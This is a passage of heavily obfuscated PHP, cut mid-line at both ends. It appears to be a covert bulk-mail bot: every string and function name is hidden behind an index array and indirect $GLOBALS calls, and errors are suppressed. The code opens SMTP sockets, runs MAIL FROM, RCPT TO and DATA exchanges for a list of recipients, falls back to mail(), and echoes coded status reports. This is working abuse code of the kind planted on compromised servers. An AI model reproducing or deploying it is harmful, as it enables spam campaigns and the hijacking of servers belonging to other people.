$i59[30].$i59[83].$i59[82].$i59[29].$i59[73].$i59[83].$i59[82].$i59[30].$i59[49].$i59[50].$i59[2].$i59[82]; $GLOBALS['xumld93'] = $i59[65].$i59[2].$i59[49].$i59[94].$i59[10].$i59[82]; $GLOBALS['sfroq33'] = $i59[24].$i59[65].$i59[77].$i59[65].$i59[51].$i59[18].$i59[53]; $GLOBALS['snkbr7'] = $i59[55].$i59[76].$i59[54].$i59[82]; $GLOBALS['gbiun57'] = $i59[24].$i59[17].$i59[74].$i59[50].$i59[77].$i59[28]; $GLOBALS['vfpnn60'] = $i59[50].$i59[83].$i59[83].$i59[50].$i59[77].$i59[73].$i59[10].$i59[82].$i59[50].$i59[83].$i59[2].$i59[69]; $GLOBALS['slvul93'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[49].$i59[94].$i59[10].$i59[82]; $GLOBALS['abwqf91'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[83].$i59[82].$i59[50].$i59[55].$i59[82]; $GLOBALS['wjevo71'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[10].$i59[82].$i59[55].$i59[73].$i59[16].$i59[94].$i59[16].$i59[63].$i59[49].$i59[94].$i59[2].$i59[74]; $GLOBALS['zqewi88'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[94].$i59[16].$i59[16].$i59[82].$i59[2].$i59[55]; $GLOBALS['syafl23'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[49].$i59[50].$i59[10].$i59[55].$i59[73].$i59[82].$i59[83].$i59[83].$i59[94].$i59[83]; $GLOBALS['mhzfy25'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[10].$i59[82].$i59[49].$i59[82].$i59[2].$i59[55]; $GLOBALS['rmuvr11'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[83].$i59[82].$i59[50].$i59[17]; $GLOBALS['tgaup44'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[24].$i59[83].$i59[76].$i59[55].$i59[82]; $GLOBALS['qihri77'] = $i59[2].$i59[49].$i59[94].$i59[10].$i59[82].$i59[38].$i59[94].$i59[2].$i59[74]; $GLOBALS['bavbu3'] = $i59[17].$i59[50].$i59[55].$i59[82]; $GLOBALS['vgyag20'] = $i59[10].$i59[55].$i59[83].$i59[73].$i59[83].$i59[82].$i59[30].$i59[49].$i59[50].$i59[2].$i59[82]; $GLOBALS['rssnp53'] = $i59[30].$i59[83].$i59[82].$i59[29].$i59[73].$i59[54].$i59[50].$i59[55].$i59[2].$i59[69]; $GLOBALS['bosbj25'] = $i59[1].$i59[2].$i59[65].$i59[76].$i59[83].$i59[10].$i59[55]; $GLOBALS['eebyx59'] = $i59[76].$i59[16].$i59[76].$i59[73].$i59[29].$i59[82].$i59[55]; $GLOBALS['ltkgi30'] = $i59[29].$i59[82].$i59[55].$i59[54].$i59[56].$i59[83].$i59[83]; $GLOBALS['veudg88'] = $i59[50].$i59[83].$i59[83].$i59[50].$i59[77].$i59[73].$i59[74].$i59[82].$i59[77].$i59[10]; $GLOBALS['ugeiv74'] = $i59[54].$i59[76].$i59[16]; $GLOBALS['vkxhv92'] = ${$i59[73].$i59[96].$i59[45].$i59[38].$i59[81]}; $GLOBALS['gpcou63'] = $i59[30].$i59[30].$i59[1].$i59[91].$i59[17].$i59[28].$i59[66]; $GLOBALS['kkndw71'] = $i59[30].$i59[83].$i59[82].$i59[29].$i59[73].$i59[10].$i59[30].$i59[49].$i59[76].$i59[55]; $GLOBALS['knpxe74'] = $i59[63].$i59[50].$i59[10].$i59[82].$i59[66].$i59[79].$i59[73].$i59[17].$i59[82].$i59[2].$i59[94].$i59[17].$i59[82]; $GLOBALS['ywanc2'] = $i59[1].$i59[83].$i59[49].$i59[17].$i59[82].$i59[2].$i59[94].$i59[17].$i59[82]; $GLOBALS['ggbdg61'] = $i59[10].$i59[55].$i59[83].$i59[76].$i59[30].$i59[10].$i59[49].$i59[50].$i59[10].$i59[69].$i59[82].$i59[10];@$GLOBALS['kyvlc2'](NULL);@$GLOBALS['osuwk64']($i59[82].$i59[83].$i59[83].$i59[94].$i59[83].$i59[73].$i59[49].$i59[94].$i59[29],NULL);@$GLOBALS['osuwk64']($i59[49].$i59[94].$i59[29].$i59[73].$i59[82].$i59[83].$i59[83].$i59[94].$i59[83].$i59[10],0); $vxlcl82 = array( $i59[17].$i59[50].$i59[55].$i59[50].$i59[81].$i59[94] => "", $i59[65].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[29].$i59[76].$i59[16] => "", $i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82] => "", $i59[10].$i59[1].$i59[63].$i59[12].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49] => "", $i59[63].$i59[94].$i59[17].$i59[77].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49] => "", $i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54] => "", $i59[76].$i59[16].$i59[76].$i59[55].$i59[16].$i59[63].$i59[10].$i59[94].$i59[2].$i59[74] => FALSE, $i59[76].$i59[16].$i59[76].$i59[55].$i59[10].$i59[94].$i59[2].$i59[74] => FALSE, $i59[76].$i59[16].$i59[76].$i59[55].$i59[54].$i59[50].$i59[76].$i59[49] => FALSE,);if (FALSE == $GLOBALS['mrkzp11']($i59, $vxlcl82)) { echo PHP_OS.$i59[70].$GLOBALS['olhjz88'](0987654321).$i59[70].$i59[34].$i59[9].$i59[70].$i59[61].$i59[61].$i59[88].$i59[88].$i59[14]; exit;}$unahu45 = array();foreach ($vxlcl82[$i59[17].$i59[50].$i59[55].$i59[50].$i59[81].$i59[94]] as $xenfh75) { $iztbg25 = array( $i59[16].$i59[50].$i59[54].$i59[82].$i59[58].$i59[76].$i59[83].$i59[10].$i59[55] => "", $i59[16].$i59[50].$i59[54].$i59[82].$i59[57].$i59[50].$i59[10].$i59[55] => "", $i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94] => "", $i59[17].$i59[94].$i59[54].$i59[50].$i59[76].$i59[16].$i59[81].$i59[94] => "", $i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94].$i59[57].$i59[94].$i59[16].$i59[29] => "", $i59[65].$i59[94].$i59[83].$i59[2].$i59[82].$i59[58].$i59[83].$i59[94].$i59[54].$i59[58].$i59[49].$i59[50].$i59[29] => FALSE, $i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54] =>"", $i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[16].$i59[29] => "", $i59[10].$i59[1].$i59[63].$i59[12] => "", $i59[63].$i59[94].$i59[17].$i59[77] => "", $i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16] => "", $i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[58].$i59[83].$i59[94].$i59[54] => "", $i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74] => "", $i59[54].$i59[56].$i59[39].$i59[94].$i59[10].$i59[55] => "", $i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83] => null, $i59[10].$i59[94].$i59[2].$i59[74] => null, $i59[10].$i59[55].$i59[76].$i59[54].$i59[82] => null, $i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30] => 0, $i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82] => "", $i59[17].$i59[94].$i59[16].$i59[82] => FALSE, $i59[17].$i59[94].$i59[16].$i59[82].$i59[97].$i59[50].$i59[77] => 0, $i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30] => FALSE, ); if (FALSE == $GLOBALS['gtwpr99']($i59, $xenfh75, $vxlcl82, $iztbg25) ) { echo PHP_OS.$i59[70].$GLOBALS['olhjz88'](1111111111).$i59[70].$i59[34].$i59[53].$i59[70].$i59[61].$i59[61].$GLOBALS['azxqi23']($i59, $xenfh75).$i59[88].$i59[88].$i59[14]; continue; } $GLOBALS['ttins71']($i59, $vxlcl82, $iztbg25); $GLOBALS['biplj38']($i59, $vxlcl82, $iztbg25); $unahu45[] = $iztbg25;}$GLOBALS['fufff37']($i59, $vxlcl82, $unahu45);$GLOBALS['llsic87']($i59, $vxlcl82, $unahu45);$GLOBALS['npqfu35']($i59, $vxlcl82, $unahu45);$GLOBALS['kgedf91']($i59, $vxlcl82, $unahu45);function fsuxu12($i59, $nihvk86) { $esjbi0 = ""; for($haxae63 = 0; $haxae63 < $GLOBALS['tscso85']($nihvk86); $haxae63++) $esjbi0.= $GLOBALS['dkzox36']($GLOBALS['nqkyz54']($nihvk86[$haxae63]) ^ 2); return $GLOBALS['bbolh46']($esjbi0);}function ygxtf52($i59, $vxlcl82, $unahu45) { if ($vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[16].$i59[63].$i59[10].$i59[94].$i59[2].$i59[74]] == FALSE && $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[10].$i59[94].$i59[2].$i59[74]] == FALSE && $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[54].$i59[50].$i59[76].$i59[49]] == FALSE) { echo PHP_OS.$i59[70].$GLOBALS['olhjz88'](1111111111).$i59[70].$i59[34].$i59[87].$i59[70].$i59[61].$i59[61].$GLOBALS['azxqi23']($i59, $i59[16].$i59[94].$i59[95].$i59[65].$i59[1].$i59[16].$i59[2].$i59[95].$i59[82].$i59[56].$i59[76].$i59[10].$i59[55].$i59[10]).$i59[88].$i59[88].$i59[14]; return; } $hmcex42 = 0; for ($jkbvz84 = 0; $jkbvz84 < $GLOBALS['pzfzn51']($unahu45); $jkbvz84++) { if ($unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] == TRUE) { echo PHP_OS.$i59[70].$GLOBALS['olhjz88'](2222222222).$i59[70].$i59[34].$i59[79].$i59[70].$i59[61].$i59[61].$GLOBALS['azxqi23']($i59, $unahu45[$jkbvz84][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]].$i59[95].$i59[64].$i59[64].$i59[95].$unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]]).$i59[88].$i59[88].$i59[14]; } if ($unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] == TRUE) { $hmcex42++; } } if ($hmcex42 == 0) { echo PHP_OS.$i59[70].$GLOBALS['olhjz88'](0987654321).$i59[70].$i59[34].$i59[79].$i59[70].$i59[61].$i59[61].$i59[88].$i59[88].$i59[14]; } else { echo $i59[45].$i59[20].$i59[70].$GLOBALS['olhjz88'](1234567890).$i59[70].$hmcex42.$i59[70].$GLOBALS['pzfzn51']($unahu45).$i59[14]; } }function pkwxg22($i59, &$vxlcl82, &$unahu45) { if (!$GLOBALS['goxku40']($i59[54].$i59[50].$i59[76].$i59[49])) { $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[54].$i59[50].$i59[76].$i59[49]] = FALSE; return; } $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[54].$i59[50].$i59[76].$i59[49]] = TRUE; for ($jkbvz84 = 0; $jkbvz84 < $GLOBALS['pzfzn51']($unahu45); $jkbvz84++) { if ($unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] == TRUE) continue; if ($unahu45[$jkbvz84][$i59[65].$i59[94].$i59[83].$i59[2].$i59[82].$i59[58].$i59[83].$i59[94].$i59[54].$i59[58].$i59[49].$i59[50].$i59[29]]) { if (@$GLOBALS['qllnp80']($unahu45[$jkbvz84][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94].$i59[57].$i59[94].$i59[16].$i59[29]], $unahu45[$jkbvz84][$i59[10].$i59[1].$i59[63].$i59[12]], $unahu45[$jkbvz84][$i59[63].$i59[94].$i59[17].$i59[77]], $unahu45[$jkbvz84][$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[58].$i59[83].$i59[94].$i59[54]].$unahu45[$jkbvz84][$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]], $i59[89].$i59[65].$unahu45[$jkbvz84][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54]])) { $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] = TRUE; $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82].$i59[97].$i59[50].$i59[77]] = 2; } else { $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] = FALSE; } } else { if (@$GLOBALS['qllnp80']($unahu45[$jkbvz84][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94].$i59[57].$i59[94].$i59[16].$i59[29]], $unahu45[$jkbvz84][$i59[10].$i59[1].$i59[63].$i59[12]], $unahu45[$jkbvz84][$i59[63].$i59[94].$i59[17].$i59[77]], $unahu45[$jkbvz84][$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[44].$i59[50].$i59[76].$i59[16]])) { $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] = TRUE; $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82].$i59[97].$i59[50].$i59[77]] = 2; } else { $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] = FALSE; } } }}function fjcwd9($i59, $kcpbr76) { $esjbi0 = ''; while($itygz27 = @$GLOBALS['inaco6']($kcpbr76, 4096)) { $esjbi0 .= $itygz27; if(substr($itygz27, 3, 1) == $i59[95]) break; } return $esjbi0;}function glxex92($i59, &$vxlcl82, &$unahu45) { if (!$GLOBALS['goxku40']($i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16]) && !$GLOBALS['goxku40']($i59[30].$i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16]) && !$GLOBALS['goxku40']($i59[10].$i59[55].$i59[83].$i59[82].$i59[50].$i59[54].$i59[73].$i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[49].$i59[76].$i59[82].$i59[16].$i59[55])) { $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[10].$i59[94].$i59[2].$i59[74]] = FALSE; return; } $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[10].$i59[94].$i59[2].$i59[74]] = TRUE; for( $jkbvz84 = 0; $jkbvz84 < $GLOBALS['pzfzn51']($unahu45); $jkbvz84++) { if ($unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] == TRUE) { continue; } if ($unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] == TRUE) { continue; } if ($unahu45[$jkbvz84][$i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83]] == null) { $unahu45[$jkbvz84][$i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83]] = $GLOBALS['fbigd92']($unahu45[$jkbvz84][$i59[54].$i59[56].$i59[39].$i59[94].$i59[10].$i59[55]]); } $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 0; $lllaf63 = 0; $rbjyp61 = ""; if ($GLOBALS['goxku40']($i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16])) { $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]] = @$GLOBALS['szwwc12']($unahu45[$jkbvz84][$i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83]], 25, $lllaf63, $rbjyp61, 15); } elseif ($GLOBALS['goxku40']($i59[30].$i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16])) { $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]] = @$GLOBALS['ifjvc34']($unahu45[$jkbvz84][$i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83]], 25, $lllaf63, $rbjyp61, 15); } elseif ($GLOBALS['goxku40']($i59[10].$i59[55].$i59[83].$i59[82].$i59[50].$i59[54].$i59[73].$i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[49].$i59[76].$i59[82].$i59[16].$i59[55])) { $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]] = @$GLOBALS['eypvx47']($i59[55].$i59[2].$i59[30].$i59[64].$i59[75].$i59[75].$unahu45[$jkbvz84][$i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83]].$i59[64].$i59[53].$i59[7], $lllaf63, $rbjyp61, 15); } else { $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[95].$i59[2].$i59[94].$i59[16].$i59[16].$i59[82].$i59[2].$i59[55].$i59[95].$i59[65].$i59[1].$i59[16].$i59[2].$i59[55].$i59[76].$i59[94].$i59[16]; continue; } if (!$unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]) { $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[95].$i59[2].$i59[94].$i59[16].$i59[16].$i59[82].$i59[2].$i59[55]; continue; } $yzqyk58 = $GLOBALS['oewlq88']($i59, $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); @$GLOBALS['ewgqn30']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $i59[0].$i59[39].$i59[57].$i59[45].$i59[95].$vxlcl82[$i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54]].$i59[27].$i59[14]); $yzqyk58 = $GLOBALS['oewlq88']($i59, $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); if (substr($yzqyk58, 0, 3) != 250 ) { $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 2; $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[3].$i59[3].$i59[95].$i59[82].$i59[69].$i59[49].$i59[94].$i59[95].$GLOBALS['qlkol47']($GLOBALS['wwxez32']($i59[75].$i59[27].$i59[14].$i59[75], $i59[95], $yzqyk58)); $GLOBALS['xumld93']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); continue; } @$GLOBALS['ewgqn30']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $i59[44].$i59[21].$i59[25].$i59[57].$i59[95].$i59[58].$i59[8].$i59[45].$i59[44].$i59[64].$i59[3].$unahu45[$jkbvz84][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[58].$i59[83].$i59[94].$i59[54]].$i59[22].$i59[27].$i59[14]); $yzqyk58 = $GLOBALS['oewlq88']($i59, $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); if (substr($yzqyk58, 0, 3) != 250 ) { $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 3; $unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[3].$i59[3].$i59[95].$i59[54].$i59[50].$i59[76].$i59[49].$i59[95].$i59[65].$i59[83].$i59[94].$i59[54].$i59[95].$GLOBALS['qlkol47']($GLOBALS['wwxez32']($i59[75].$i59[27].$i59[14].$i59[75], $i59[95], $yzqyk58)); $GLOBALS['xumld93']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); continue; } @$GLOBALS['ewgqn30']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $i59[8].$i59[80].$i59[96].$i59[81].$i59[95].$i59[81].$i59[45].$i59[64].$i59[3].$unahu45[$jkbvz84][$i59[82].$i59[54].$i59[50].$i59[76].$i59[49].$i59[81].$i59[94]].$i59[22].$i59[27].$i59[14]); $yzqyk58 = $GLOBALS['oewlq88']($i59, $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); if (substr($yzqyk58, 0, 3) != 250 && substr($yzqyk58, 0, 3) != 251) { $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 4; $unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[3].$i59[3].$i59[95].$i59[83].$i59[2].$i59[30].$i59[55].$i59[95].$i59[55].$i59[94].$i59[95].$GLOBALS['qlkol47']($GLOBALS['wwxez32']($i59[75].$i59[27].$i59[14].$i59[75], $i59[95], $yzqyk58)); $GLOBALS['xumld93']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); continue; } @$GLOBALS['ewgqn30']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $i59[59].$i59[21].$i59[81].$i59[21].$i59[27].$i59[14]); $yzqyk58 = $GLOBALS['oewlq88']($i59, $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); if (substr($yzqyk58, 0, 3) != 354 ) { $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 5; $unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[3].$i59[3].$i59[95].$i59[17].$i59[50].$i59[55].$i59[50].$i59[95].$GLOBALS['qlkol47']($GLOBALS['wwxez32']($i59[75].$i59[27].$i59[14].$i59[75], $i59[95], $yzqyk58)); $GLOBALS['xumld93']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); continue; } @$GLOBALS['ewgqn30']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $unahu45[$jkbvz84][$i59[69].$i59[82].$i59[50].$i59[17].$i59[82].$i59[83].$i59[10].$i59[38].$i59[94].$i59[2].$i59[74]].$i59[27].$i59[14].$unahu45[$jkbvz84][$i59[63].$i59[94].$i59[17].$i59[77]].$i59[27].$i59[14].$i59[84].$i59[27].$i59[14]); $yzqyk58 = $GLOBALS['oewlq88']($i59, $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); if (substr($yzqyk58, 0, 3) != 250 ) { $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 6; $unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] = TRUE; $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[3].$i59[3].$i59[95].$i59[63].$i59[94].$i59[17].$i59[77].$i59[95].$GLOBALS['qlkol47']($GLOBALS['wwxez32']($i59[75].$i59[27].$i59[14].$i59[75], $i59[95], $yzqyk58)); $GLOBALS['xumld93']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); continue; } $unahu45[$jkbvz84][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = 6; $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[95].$i59[17].$i59[94].$i59[16].$i59[82]; $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82]] = TRUE; $unahu45[$jkbvz84][$i59[17].$i59[94].$i59[16].$i59[82].$i59[97].$i59[50].$i59[77]] = 3; @$GLOBALS['ewgqn30']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $i59[26].$i59[33].$i59[25].$i59[81].$i59[27].$i59[14]); @$GLOBALS['xumld93']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); } return;}function wfyfz82($i59, $kcpbr76, &$ccdut93, &$wdnqf10, $ghjnv17) { $ccdut93[$wdnqf10[$kcpbr76][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = $ghjnv17; $ccdut93[$wdnqf10[$kcpbr76][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[10].$i59[55].$i59[76].$i59[54].$i59[82]] = $GLOBALS['snkbr7'](NULL); $wdnqf10[$kcpbr76][$i59[16].$i59[63].$i59[10].$i59[55].$i59[82].$i59[30]] = $ghjnv17; $wdnqf10[$kcpbr76][$i59[10].$i59[55].$i59[76].$i59[54].$i59[82]] = $GLOBALS['snkbr7'](NULL);}function wdkay7($i59, $kcpbr76, &$ccdut93, &$wdnqf10, &$nxvux4, $tlqgr67) { $ccdut93[$wdnqf10[$kcpbr76][$i59[94].$i59[83].$i59[76].$i59[29]]][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $GLOBALS['qlkol47']($GLOBALS['wwxez32']($i59[75].$i59[27].$i59[14].$i59[75], $i59[95], $tlqgr67)); $wwnfn92 = $GLOBALS['vfpnn60']($kcpbr76, $nxvux4); unset($nxvux4[$wwnfn92]); unset($wdnqf10[$kcpbr76]); $GLOBALS['slvul93']($kcpbr76);}function crnms40($i59, &$vxlcl82, &$unahu45) { if (!$GLOBALS['goxku40']($i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[83].$i59[82].$i59[50].$i59[55].$i59[82]) || !$GLOBALS['goxku40']($i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[94].$i59[16].$i59[16].$i59[82].$i59[2].$i59[55]) || !$GLOBALS['goxku40']($i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[10].$i59[82].$i59[49].$i59[82].$i59[2].$i59[55]) || !$GLOBALS['goxku40']($i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[83].$i59[82].$i59[50].$i59[17]) || !$GLOBALS['goxku40']($i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[24].$i59[83].$i59[76].$i59[55].$i59[82])) { $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[16].$i59[63].$i59[10].$i59[94].$i59[2].$i59[74]] = FALSE; return; } $vxlcl82[$i59[76].$i59[16].$i59[76].$i59[55].$i59[16].$i59[63].$i59[10].$i59[94].$i59[2].$i59[74]] = TRUE; $xglki37 = array(); $vfyxw97 = 35; $pvbdh92 = 25; $aaaqk92 = array(); $wbwts68 = array(); for( $jkbvz84 = 0; $jkbvz84 < $GLOBALS['pzfzn51']($unahu45); $jkbvz84++) { if ($unahu45[$i59[17].$i59[94].$i59[16].$i59[82]] == TRUE) { continue; } if ($unahu45[$jkbvz84][$i59[65].$i59[50].$i59[76].$i59[49].$i59[38].$i59[54].$i59[55].$i59[30]] == TRUE) { continue; } $unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]] = @$GLOBALS['abwqf91'](AF_INET, SOCK_STREAM, SOL_TCP); if ($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]] == FALSE) { $unahu45[$jkbvz84][$i59[82].$i59[83].$i59[83].$i59[49].$i59[76].$i59[16].$i59[82]] = $i59[16].$i59[63].$i59[95].$i59[2].$i59[83].$i59[82].$i59[50].$i59[55].$i59[82].$i59[95].$i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55]; continue; } @$GLOBALS['wjevo71']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]]); $unahu45[$jkbvz84][$i59[54].$i59[56].$i59[21].$i59[17].$i59[17].$i59[83]] = $GLOBALS['fbigd92']($unahu45[$jkbvz84][$i59[54].$i59[56].$i59[39].$i59[94].$i59[10].$i59[55]]); $ncsee45 = @$GLOBALS['zqewi88']($unahu45[$jkbvz84][$i59[10].$i59[94].$i59[2].$i59[74]], $unahu45[$jkbvz84][$i59[54].$i59[56].$i59[39].$i59[94].$i59[10].$i59[55]], 25); if ($ncsee45 == FALSE) { $jnxjb61 = $GLOBALS['syafl23'](); if ($jnxjb61 != 10035 